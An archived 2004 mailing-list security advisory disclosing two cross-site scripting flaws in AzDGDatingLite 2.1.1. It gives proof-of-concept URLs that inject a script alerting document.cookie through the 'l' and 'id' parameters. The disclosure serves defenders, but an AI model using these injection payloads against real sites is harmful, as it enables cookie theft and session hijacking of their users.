lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20040408154840.31042.qmail@web21403.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]

{================================================================================}
{                              [waraxe-2004-SA#014]   
                          }
{================================================================================}
{                                                     
                          }
{               [ Cross-Site Scripting aka XSS in
AzDGDatingLite ]               }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


AzDGDatingLite:        Version 2.1.1 (probably older
versions are affected too)
Writed by:             AzDG (support@...g.com)
Homepage:              http://www.azdg.com            
 



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


1. Cross-Site Scripting in language variable:


http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script>



2. Cross-Site Scripting in view.php:


http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script>




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq
readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------


__________________________________
Do you Yahoo!?
Yahoo! Small Business $15K Web Design Giveaway 
http://promotions.yahoo.com/design_giveaway/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ